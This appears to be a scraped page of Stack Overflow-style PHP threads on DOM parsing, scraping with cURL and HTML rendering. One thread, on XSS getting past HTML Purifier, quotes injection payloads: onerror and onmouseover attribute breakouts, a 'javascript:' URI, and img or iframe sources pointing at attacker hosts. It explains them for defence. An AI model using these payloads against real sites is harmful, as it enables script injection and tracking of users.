Multiple html, head, body found with PHP XPath

I'm using cURL, DOMDocument, loadHTML, and DOMXPath in PHP to get the contents of URLs. In order to verify the validity of the data, I also run checks on the number of html, head and body tags that were retrieved.
My setup works fine for the large majority of URLs I enter. However, for some URLs, an unexpected number of those tags is reported. The XPath queries:
$html = $this->runXpath('/html');
$head = $this->runXpath('/html/head');
$body = $this->runXpath('/html/body');
And the check:
if($html->length > 1) {
echo 'Too many html tags';
}
https://www.chownow.com/: 2x HTML (yes, I see the iframe, but that is generated through JavaScript, which cURL shouldn't render? Also, the XPath states that the html should be a child of #document, which, according to $tag->parentNode->nodeName, both HTML elements are? The second HTML tag also doesn't show up in either 'View source' or the response body from the cURL request).
http://neilpatel.com/: 2x HTML? (Once again a video, but seemingly not even a relevant iframe tag in the DOM source.)
https://www.groovehq.com/: 2x BODY? (An iframe again, but this time no double html error; a double body error instead?)
Questions
Why does XPath seem to think there are multiple instances of those tags, while I can't find them as such in the cURL response body (using Ctrl-F on the output), nor in 'View source'?
How can I "see what XPath sees" in order to debug similar cases?
It would almost seem that DOMDocument or XPath parses JavaScript; does it? If not, how do I explain the examples above?
Any additional questions I will gladly answer. Thanks in advance!
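A debugging sketch for the "see what XPath sees" part of the question: DOMDocument queries the tree that libxml built after its error recovery, not the raw bytes cURL returned, so dumping that tree together with libxml's recovery messages often explains surprising node counts. The trailing-junk input below is a made-up illustration, not taken from any of the sites above:

```php
<?php
// Malformed markup (e.g. content after </html>) can make the parser
// emit nodes you won't find verbatim in the raw response body.
$raw = '<html><body><p>hi</p></body></html><div>trailing junk</div>';

$dom = new DOMDocument();
libxml_use_internal_errors(true);   // collect parse errors instead of emitting warnings
$dom->loadHTML($raw);

foreach (libxml_get_errors() as $error) {
    // Recovery messages often explain surprising node counts.
    echo trim($error->message), "\n";
}
libxml_clear_errors();

// This is the tree XPath actually queries, not the raw bytes from cURL:
echo $dom->saveHTML();
```

Comparing this output against the raw cURL body (rather than against the browser's 'View source') shows exactly where the parser diverged.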

Related

XSS vulnerabilities still exist even after using HTML Purifier

I'm testing one of my web applications using Acunetix. To protect this project against XSS attacks, I used HTML Purifier. This library is recommended by most PHP developers for this purpose, but my scan results show that HTML Purifier cannot protect us from XSS attacks completely. The scanner found two ways of attack by sending different harmful inputs:
1<img sRc='http://attacker-9437/log.php? (See HTML Purifier result here)
1"onmouseover=vVF3(9185)" (See HTML Purifier result here)
As you can see from the results, HTML Purifier could not detect such attacks. I don't know whether there is any specific option in HTML Purifier to solve such problems, or whether it is really unable to detect these methods of XSS attack.
Do you have any idea? Or any other solution?
(This is a late answer since this question is becoming the place duplicate questions are linked to, and previously some vital information was only available in comments.)
HTML Purifier is a contextual HTML sanitiser, which is why it seems to be failing on those tasks.
Let's look at why in some detail:
1<img sRc='http://attacker-9437/log.php?
You'll notice that HTML Purifier closed this tag for you, leaving only an image injection. An image is a perfectly valid and safe tag (barring, of course, current image library exploits). If you want it to throw away images entirely, consider adjusting the HTML Purifier whitelist by setting HTML.Allowed.
That the image from the example is now loading a URL that belongs to an attacker, thus giving the attacker the IP of the user loading the page (and nothing else), is a tricky problem that HTML Purifier wasn't designed to solve. That said, you could write an HTML Purifier attribute checker that runs after purification, but before the HTML is put back together, like this:
// a bit of context
$htmlDef = $this->configuration->getHTMLDefinition(true);
$image = $htmlDef->addBlankElement('img');
// HTMLPurifier_AttrTransform_CheckURL is a custom class you've supplied,
// and checks the URL against a white- or blacklist:
$image->attr_transform_post[] = new HTMLPurifier_AttrTransform_CheckURL();
The HTMLPurifier_AttrTransform_CheckURL class would need to have a structure like this:
class HTMLPurifier_AttrTransform_CheckURL extends HTMLPurifier_AttrTransform
{
    public function transform($attr, $config, $context) {
        $destination = $attr['src'];
        if (is_malicious($destination)) {
            // ^ is_malicious() is something you'd have to write
            $this->confiscateAttr($attr, 'src');
        }
        return $attr;
    }
}
Of course, it's difficult to do this 'right':
if this is a live check against some web service, it will slow purification down to a crawl
if you're keeping a local cache, you run the risk of having outdated information
if you're using heuristics ("that URL looks like it might be malicious based on indicators x, y and z"), you run the risk of missing whole classes of malicious URLs
1"onmouseover=vVF3(9185)"
HTML Purifier assumes the context your HTML is set in is a <div> (unless you tell it otherwise by setting HTML.Parent).
If you just feed it an attribute value, it's going to assume you're going to output this somewhere so the end-result looks like this:
...
<div>1"onmouseover=vVF3(9185)"</div>
...
That's why it appears not to be doing anything about this input: it's harmless in this context. You might not even want to strip this information in that context. I mean, we're talking about this snippet here on Stack Overflow, and that's valuable (and not causing a security problem).
Context matters. Now, if you instead feed HTML Purifier this snippet:
<div class="1"onmouseover=vVF3(9185)"">foo</div>
...suddenly you can see what it's made to do:
<div class="1">foo</div>
Now it's removed the injection, because in this context, it would have been malicious.
What to use HTML Purifier for and what not
So now you're left to wonder what you should be using HTML Purifier for, and when it's the wrong tool for the job. Here's a quick run-down:
you should use htmlspecialchars($input, ENT_QUOTES, 'utf-8') (or whatever your encoding is) if you're outputting into an HTML document and aren't interested in preserving HTML at all; HTML Purifier is unnecessary overhead here and it'll let some things through
you should use HTML Purifier if you want to output into an HTML document and allow formatting, e.g. if you're running a message board and you want people to be able to format their messages using HTML
you should use htmlspecialchars($input, ENT_QUOTES, 'utf-8') if you're outputting into an HTML attribute (HTML Purifier is not meant for this use case)
You can find some more information about sanitising / escaping by context in this question / answer.
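The escaping-vs-sanitising distinction from the run-down above can be sketched in a few lines. The HTML Purifier lines are commented out because the library is an external dependency (the ezyang/htmlpurifier package), while htmlspecialchars() ships with PHP:

```php
<?php
$input = '<b>bold</b><script>alert(1)</script>';

// Escaping: for contexts where HTML should NOT be preserved.
echo htmlspecialchars($input, ENT_QUOTES, 'utf-8'), "\n";
// -> &lt;b&gt;bold&lt;/b&gt;&lt;script&gt;alert(1)&lt;/script&gt;

// Sanitising: keeps whitelisted markup, drops the rest.
// require 'vendor/autoload.php';
// $purifier = new HTMLPurifier(HTMLPurifier_Config::createDefault());
// echo $purifier->purify($input); // the <script> is removed, <b> survives
```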
All HTML Purifier seems to be doing, from the brief look that I gave, was HTML-encoding certain characters such as <, > and so on. However, there are other means of invoking JS without using the normal HTML characters:
javascript:prompt(1) // In image tags
src="http://evil.com/xss.html" // In iFrame tags
Please review the comments (by @pinkgothic) below.
Points below:
This would be HTML injection, which does effectively lead to XSS. In this case, you open an <img> tag and point the src to some non-existent file, which in turn raises an error. That can then be handled by the onerror handler to run some JavaScript code. Take the following example:
<img src=x onerror=alert(document.domain)>
The entry point for this is generally gained by prematurely closing another tag in an input. For example (URL-decoded for clarity):
GET /products.php?type="><img src=x onerror=prompt(1)> HTTP/1.1
This, however, is easily mitigated by HTML-escaping meta-characters (i.e. < and >).
Same as above, except this could be closing off an HTML attribute instead of a tag and inserting its own attribute. Say you have a page where you can supply the URL for an image:
<img src="$USER_DEFINED">
A normal example would be:
<img src="http://example.com/img.jpg">
However, inserting the above payload, we cut off the src attribute (which now points to a non-existent file) and inject an onerror handler:
<img src="1"onerror=alert(document.domain)">
This executes the same payload mentioned above.
Remediation
This is heavily documented and tested in multiple places, so I won't go into detail. However, the following two articles are great on the subject and will cover all your needs:
https://www.acunetix.com/websitesecurity/cross-site-scripting/
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

HTML doesn't get rendered, why does it happen?

On a PHP + MySQL project, there's a string of text coming from a MySQL table that contains HTML tags, but those tags never get rendered by Google Chrome or any other browser I've tried yet:
You can see that the HTML tags (p, strong) aren't getting interpreted by the browser.
So the result is:
EDIT: HTML/PHP
<div class="winery_description">
<?php echo $this->winery['description']; ?>
</div>
$this->winery being the array result of the SQL SELECT.
EDIT 2: I'm the dumbest man in the world: the source contains entities. So the new question is: how do I force entities to be interpreted?
Real source:
Any suggestions? Thanks!
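If the description really is stored with entities (&lt;p&gt; instead of <p>), a server-side fix is to decode them before echoing. A minimal sketch, assuming the stored content is trusted or has already been sanitised; the sample value is hypothetical:

```php
<?php
// Hypothetical entity-encoded value as it might come out of the table:
$description = '&lt;p&gt;&lt;strong&gt;Great winery&lt;/strong&gt;&lt;/p&gt;';

// Decode the entities so the browser receives real tags.
// Only do this with trusted/sanitised content, or you reopen XSS.
echo html_entity_decode($description, ENT_QUOTES, 'UTF-8');
// -> <p><strong>Great winery</strong></p>
```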
You are probably using innerText or textContent to set the content of your div, which just replace the child nodes of the div with a single text node.
Use innerHTML instead, to have the browser parse the HTML and create the appropriate DOM nodes.
The answer provided by @Paulpro is correct.
Also note that if you are using jQuery, be sure to use the .html() method instead of .text() method:
$('#your_element').html('<h1>This works!</h1>');
$('#another_element').text('<h2>Wrong; you will see the literal <h2> tags in the output</h2>');

A PHP implementation of a certain jQuery script: finding the parent of a p element with text of a certain length

I found this library, phpQuery, and I wanted to know how I can utilize this jQuery:
var source = $('p:not(:has(iframe))').filter(function () {
    return $(this).text().length > 150;
}).slice(0, 1).parent();
It finds the first p element without an iframe that has text longer than 150 characters and takes its parent. I was wondering how I could do this in a PHP library. phpQuery is a PHP implementation of jQuery, but I've been confused about how to properly convert the script above.
Try using http://simplehtmldom.sourceforge.net/manual.htm
You can find tags on an HTML page with selectors just like jQuery.
Just read the (simple) manual.
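If phpQuery turns out to be awkward, the same selection can also be sketched with PHP's built-in DOMXPath. The sample HTML and the id attributes below are made up for illustration:

```php
<?php
// Made-up input: one short paragraph, one long one.
$html = '<div id="a"><p>short</p></div>'
      . '<div id="b"><p>' . str_repeat('x', 200) . '</p></div>';

$dom = new DOMDocument();
libxml_use_internal_errors(true); // tolerate real-world markup
$dom->loadHTML($html);
libxml_clear_errors();

$xpath = new DOMXPath($dom);
// First <p> with no <iframe> descendant and more than 150 characters of
// text, then step up to its parent -- mirroring filter()/slice(0,1)/parent():
$nodes = $xpath->query(
    '(//p[not(.//iframe)][string-length(normalize-space(.)) > 150])[1]/..'
);
if ($nodes->length > 0) {
    echo $nodes->item(0)->getAttribute('id'), "\n"; // "b" for this input
}
```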

PHP Simple HTML DOM Parser denies to handle [invalid] HTML - first trial fails

G'day dear community, hello all!
Well, I am trying to select either a class or an id using PHP Simple HTML DOM Parser, with absolutely no luck. Perhaps I have to study the man pages again and again.
Well, the DOM technique somewhat goes over my head:
But my example is very simple and seems to comply with the examples given in the manual (simplehtmldom.sourceforge AT net/manual.htm), yet it just won't work; it's driving me up the wall. Other example scripts shipped with Simple DOM work fine.
See the example: http://www.aktive-buergerschaft.de/buergerstiftungsfinder
This is the easiest example I have found ... The question is: how to parse it?
Should I do it with Perl? The example HTML page is invalid HTML.
I do not know if the Simple HTML DOM Parser is able to handle badly malformed HTML
(probably not), and then I am lost.
Well, it is pretty hard to believe, but you can get the content with file_get_contents. Afterwards, though, you have to do the parsing job yourself, and there I have some missing parts!
Finally: if I cannot get it to run, I can try out some Perl parsers, e.g. HTML::TreeBuilder::XPath.
1: Check whether file_get_contents is working.
2: If not, use cURL, fopen, or telnet to read the data.
Simple HTML DOM filters out all the noise and can process malformed tags as well...
The problem might be with your data retrieval.
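If Simple HTML DOM still chokes on the page, note that PHP's DOMDocument also recovers from invalid markup once libxml's warnings are silenced. A small sketch with deliberately broken HTML (the class name is made up):

```php
<?php
// Deliberately invalid markup: the <p> tags are never closed.
$badHtml = '<div class="list"><p>item one<p>item two</div>';

$dom = new DOMDocument();
libxml_use_internal_errors(true); // suppress "invalid HTML" warnings
$dom->loadHTML($badHtml);
libxml_clear_errors();

$xpath = new DOMXPath($dom);
// The parser auto-closed the paragraphs, so both are found:
echo $xpath->query('//div[@class="list"]/p')->length, "\n"; // 2
```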

How do I screen scrape a website and get data within div?

How can I screen scrape a website using cURL and show the data within a specific div?
Download the page using cURL (there are a lot of examples in the documentation). Then use a DOM parser, for example Simple HTML DOM or PHP's DOM, to extract the value from the div element.
After downloading with cURL use XPath to select the div and extract the content.
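A sketch of that cURL + XPath approach; the URL and the div id "content" are placeholder assumptions, not taken from the question:

```php
<?php
// Fetch a page body with cURL. Returns '' on failure.
function fetchPage(string $url): string {
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    $html = curl_exec($ch);
    curl_close($ch);
    return $html !== false ? $html : '';
}

// Extract the outer HTML of every <div> with the given id.
function extractDiv(string $html, string $id): string {
    $dom = new DOMDocument();
    libxml_use_internal_errors(true); // tolerate real-world markup
    $dom->loadHTML($html);
    libxml_clear_errors();

    $xpath  = new DOMXPath($dom);
    $result = '';
    foreach ($xpath->query(sprintf('//div[@id="%s"]', $id)) as $div) {
        $result .= $dom->saveHTML($div); // saveHTML($node) gives outer HTML
    }
    return $result;
}

// Usage (network call, so output depends on the page):
// echo extractDiv(fetchPage('http://www.example.com/'), 'content');
```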
A possible alternative.
# We will store the web page in a string variable.
var string page
# Read the page into the string variable.
cat "http://www.abczyx.com/path/to/page.ext" > $page
# Output the portion in the third (3rd) instance of "<div...</div>"
stex -r -c "^<div&</div\>^3" $page
This code is in biterscripting. I am using 3 as a sample to extract the 3rd div. If you want to extract the div that contains, say, the string "ABC", then use this command syntax:
stex -r -c "^<div&ABC&</div\>^" $page
Take a look at this script http://www.biterscripting.com/helppages/SS_ExtractTable.html . It shows how to extract an element (div, table, frame, etc.) when the elements are nested.
Fetch the website content using a cURL GET request. There's a code sample on the curl_exec manual page.
Use a regular expression to search for the data you need. There's a code sample on the preg_match manual page, but you'll need to do some reading on regular expressions to be able to build the pattern you need. As Yacoby mentioned (which I hadn't thought of), a better idea may be to examine the DOM of the HTML page using PHP's SimpleXML or DOM parser.
Output the information you've found from the regex/parser in the HTML of your page (within the required div).